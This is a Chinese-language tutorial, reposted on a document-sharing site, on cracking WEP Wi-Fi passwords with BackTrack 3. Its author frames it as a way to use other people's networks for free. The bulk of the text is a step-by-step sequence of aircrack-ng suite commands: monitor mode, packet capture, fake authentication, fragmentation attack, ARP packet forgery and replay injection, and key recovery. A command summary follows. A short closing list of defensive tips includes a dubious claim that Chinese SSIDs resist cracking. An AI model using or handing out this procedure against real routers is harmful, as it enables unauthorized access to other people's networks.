2023年教你用笔记本破解无线路由器密码.doc

《2023年教你用笔记本破解无线路由器密码.doc》由会员分享，可在线阅读，更多相关《2023年教你用笔记本破解无线路由器密码.doc（28页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、教你用笔记本破解无线路由器密码 收藏 最近很多人问我怎么破解WiFi密码看来大家都对免费的东西比较有爱好。要么也也许是我太招摇了囧好吧，我就写篇小小的教程，看完后，你应当可以破解大部分无线路由器密码了，写这个教程也是为了加强大家对无线网络安全性的重视，后面也有简朴的防破解的办法。好了，正式开始。一方面，你需要的工具：软件： BackTrack 3（简称BT3）BT3有光盘版，硬盘版尚有U盘版，由于本本基本上可以刻碟，我就懒得弄那些U盘版，硬盘版了，直接刻了张碟，所以这篇教程使用光盘版。下载地址：U盘版：光盘版： 硬件： 一台笔记本，或者台式机配无线网卡。假如是笔记本，在设备管理器中查看一下你的

2、网卡类型，我的是Intel 3945ABG的，现在市面上大部分笔记本都是用的这个网卡，所以，这篇教程重要针对这个网卡，假如不是，也许也可以破解成功，我也就没有测试了，台式机用的无线网卡同理，也有支持BT3的。图01-查看网卡 其余瓜子，饮料什么的自备。关于前面的准备部分，网上很多教程都解释得很具体了，我也没做过关于U盘版或者硬盘版，所以这部分跳过有问题的在下面留言。插入光盘开机等待几分钟，有个选择模式的界面，一般选择第一个就会进入BT3的图形界面，如图02，假如不能进去，输入账号root，密码toor，然后输入startx，也可以进去，但是我测试过，我的本本进不去，网上找到的答案是显卡不支持（

3、ATI 2400 XT）进不去第一个的尝试选择第四个图形模式，我的可以进去，假如这个也进不去，那就每个图形模式都试试，都不行的话，那就是RP问题了，你的本本显卡不支持图02-进入后界面然后点右下角的一个黑黑的显示器同样的图标打开一个控制台，如图03：图03-打开控制台这时候可以开始输入命令了。 ifconfig -a这是查看当前网卡信息的，-a是显示所有网卡，假如没有这个参数，就无法显示出无线网卡。这条命令可以查看当前网卡的MAC地址，其中，无线网卡的MAC地址是我们需要的，就在HWaddr后面的6个16进制字符，后面的那么多00是不要的，应当是为了IP6做准备的。如图04。图04-查看网卡信

4、息为了避免信息泄露，我把我的MAC地址和要破解的AP（Access Point，接入点）的MAC地址的后2个字节都隐藏了呵呵可以看到，现在的无线网卡名称是wlan0，这是BT3自动加载的iwl3945驱动起的名字，而这个驱动是不支持之后的破解工作的，所以我们需要换个驱动。 modprobe -r iwl3945卸载当前iwl3945驱动。 modprobe ipwraw加载ipwraw驱动，这个驱动是可以正常使用的。加载之后再输入ifconfig a试试，就会发现wlan0不见了，出来了个wifi0，如图05，这就是ipwraw给我们的网卡起的名字。这个名字之后会多次用到。这时候也需要把自己的

5、MAC地址记住，最佳是在桌面新建一个文本文献，然后复制进去，方便之后的命令调用。图05-加载3945驱动 airomon-ng start wifi0这条命令是设立无线网卡为监听模式，由于Windows下这个很难实现，而Linux由于开源，所以大部分黑客软件都是Linux平台下的，我刚开始用BT3的时候就由于iwl3945驱动不能使用监听模式而卡在这里了。设立成功后，如图06。图06-设立监听模式 airodump-ng wifi0既然要破解，那么总得有目的吧，这条命令就是检测当前所能搜索到的所有无线网络信号。其中涉及频道，信号强度等信息。运营后如图07。图07-查看存在AP里面的几个参数，解

6、释一下，网上也有解释的，但是解释得不太清楚。BSSID这个就是路由器的MAC地址了，我要破解的是下面那个，上面那个信号太差。PWR这个是信号强度，但是我的电脑显示不出来，显示不出来也没关系，不妨碍之后的破解的，只要在Windows中显示信号很好就可以了。Beacons这个是路由器对外发包，也许是SSID广播，我也不太清楚，假如看到这个数据在涨，就代表这个AP还行，一般是1秒涨2030吧。太慢了就有也许由于信号的因素破解失败。#Data这个数据最最重要，这个代表可以用于破解的包，一般这个数据到达1W+，一般的64位的WEP密码就可以破解了。之后我们要做的，就是等待他到达1W，假如数据增长很缓慢（

7、几分钟才增长1），那就只好用另一种方法了，就是发包袭击，这个在后面有介绍。#/sDATA增长的速度。CH频道，总共有11个频道，可以看到，我要破解的AP的频道是11。MB无线的速度，现在一般都是54MB的了。CIPHER加密方式，假如是WEP，就可以用这样的方式破解，假如是WPA/WPA2，目前就只能暴力破解了，话说我现在还不知道怎么暴力破解等你破解出来的密码都是12345，之类的密码时，你就会觉得自己付出的和得到的完全不成比例TAT。在这里我们只考虑WEP加密的情况。AUTH这个应当是authorization的缩写，也就是授权的意思，我也不明白这个有什么用。也许路由器要给客户端发包，就需要

8、验证客户端权限。现在这里是空的，之后会有值的。ESSID简朴理解，这个就是路由器的名字了。这一步，我们要做的就是拟定需要破解的路由器和它的MAC地址，DATA值增长速度比较快，或者在Windows下信号比较好，或者PWR比较高的，优先。同样，可以把MAC地址写到文本文献中去。 airodump-ng -ivs -w god -c 11 wifi0这个命令是检测某个频道的路由器发包，并且保存可用包(也就是#DATA)到一个文献god，这个god是可以改成你喜欢的名字的，但是自己要记住参数中，-c是指频道，后面跟着我要破解的路由器的信号频道，也就是11。wifi0是我的网卡名称。输入完这个命令后，

9、这个窗口就不用关了，它要一直抓包的，我们称之为1号窗口。这时候我们重新打开一个控制台，也就是黑框框。输入之后的命令： aireplay-ng -1 0 -a 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* wifi0-a后面跟着的是目的MAC地址。-h后面跟着的是本机的无线网卡MAC地址。wifi0是本机无线网卡名称这条命令是获取授权，测试模拟发包袭击，具体有什么用，我不太清楚 也许是测试能否通过发包进行袭击吧。成功后会出现如下信息：Association successful :-)然后上面那个窗口中AUTH栏值变成OPN。图08-测试连接 aireplay-ng -5

10、 -b 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* wifi0参数中-5是aireplay这个程序使用的模式，无需深究。-b后面跟着的是目的MAC地址。-h后面跟着的是本机的无线网卡MAC地址。wifi0是本机无线网卡名称这个命令，我的理解是是获取到一个特定的包制作袭击源，然后可以用这个袭击源进行发包袭击。这一步是最难成功的，往往失败就是由于这一步。假如你选择的AP等了半天DATA值还是0，可以放弃那个了。输入命令后，就开始抓包了，下面的数据会涨，如图09，等抓到一个有用的包的时候，它会问你是否用这个包，如图10，按Y，然后回车就OK。但是往往获取到的包都是袭击失败的

11、，如图11，这样就只好继续等了，它会自动开始下一轮抓包的，所以，破解也是需要RP的RP低的兄弟姐妹还是飘走吧图09-获取可用包图10-获取到可用包图11-袭击失败再说说DATA值为什么会保持在0或者增长缓慢。假如这个AP是有客户端无线连接的，那么它发的数据就多，获取到可用包的几率就大。假如没客户端连接，它做的工作就是不断向外发送SSID广播，简朴说就是告诉大家，我是一个路由器，我的名字是*，我的信号有多大，我有没有密码等等。这样的包，可用来破解密码的（也就是DATA包）是凤毛麟角啊，一般5000个包能出一个都算不错了在等待的过程中，可以打开另一个窗口，输入第9条命令 aircrack-ng -

12、b 00:23:CD:89:*:* god-01.ivs参数中-b后面跟着的是目的MAC地址。这个就是正式破解了，其中god-01.ivs是我们抓的数据包，也就是DATA包保存成的文献，假如你多次使用airodump抓包，那么你可以去root目录看看最新生成的文献名，然后相应变更。这个程序就用这些抓到的DATA包来计算出密码。运营命令后如图12。图12-尝试破解失败可以看到破解失败了。只有34个IVs（DATA包），不失败才怪呢，之前说过一般要1W+才可以的。第2个窗口中，等啊等，终于等到一个有用的包了，成功信息如图13图13-获取到可用于袭击的包成功后程序会生成一个xor文献fragment

13、-.xor，记住这个就好，下一条命令要用。接着输入： packetforge-ng -0 -a 00:23:CD:89:*:* -h 00-1F-3C-5B-*-* -k 255.255.255.255 l 255.255.255.255 -y fragment-.xor -w moon参数中-a后面跟着的是目的MAC地址。-h后面跟着本地无线网卡MAC地址。-y是上一步中生成的那个xor文献-w是生成的ARP包文献名，我填了moon，可更改，也要记住。这个命令是伪造ARP包，用于ARP袭击。最后一条命令，就让路由器做临死前的挣扎吧? aireplay-ng -2 -r moon -x 512

14、 wifi0moon是上一步保存的ARP包文献名。512是袭击线程，一般512够了，1024我怕大了，没敢弄。wifi0是网卡名称。输入完这一条，就可以看到第1个窗口中的DATA值暴增，如图14。图14-发包袭击图上可以看到，DATA的增长速度是361个/s。然后我们就切换到第3个窗口，就是aircrack那个窗口看看吧，等DATA到了5000，就会自动开始 破解，假如没成功，DATA到达10000又会破解一次。这一切都发生地很迅速。不久，密码出来了，如图15。图15-破解成功从图15可以看到，密码就是。由于WEP中64位加密是5个ASCII码或者10个16进制字符，所以，我们可以切换Wind

15、ows，然后用连接上去，如图16，信号很好哦！图16-无线连接【总结】把所有用到的命令都总结一下，内的是需要更改的，方便大家对照修改。 ifconfig a modprobe -r iwl3945 modprobe ipwraw airomon-ng start 网卡名 airodump-ng 网卡名 airodump-ng -ivs -w DATA包文献名 -c 频道 网卡名 aireplay-ng -1 0 -a 目的MAC -h 网卡MAC 网卡名 aireplay-ng -5 -b 目的MAC -h 网卡MAC 网卡名 aircrack-ng -b 目的MAC DATA包文献名-0*.

16、ivs packetforge-ng -0 -a 目的MAC -h 网卡MAC -k 255.255.255.255 l 255.255.255.255 -y 上一步的xor文献名 -w 袭击包文献名? aireplay-ng -2 -r 袭击包文献名 -x 袭击线程 网卡名在本教程中:网卡名 wifi0DATA包文献名god频道11目的MAC00:23:CD:89:*:*网卡MAC00-1F-3C-5B-*-*上一步的xor文献名fragment-.xor袭击包文献名moon袭击线程512然后说说怎么样防范自己的AP被像我这样的不速之客破解然后蹭网吧。 你可以关闭SSID广播，这样别人就搜索不到你的无线信号了。 你可以设立WPA/WPA2加密，现在主流的路由器都支持这个功能，为什么不用呢？ 你可以把你的SSID改成中文，虽然我没试过，但是网上貌似说这样就不可以破解了。 你可以设立MAC地址绑定，但是可以查看合法MAC并伪装MAC的方式破解（感谢楼下兄弟提供建议）至此，教程就结束了，有什么问题，可以跟帖问。我也是个菜鸟，这篇教程也是东拼西凑，再加上自己的一些见解弄出来的，难免有不对的地方，欢迎指正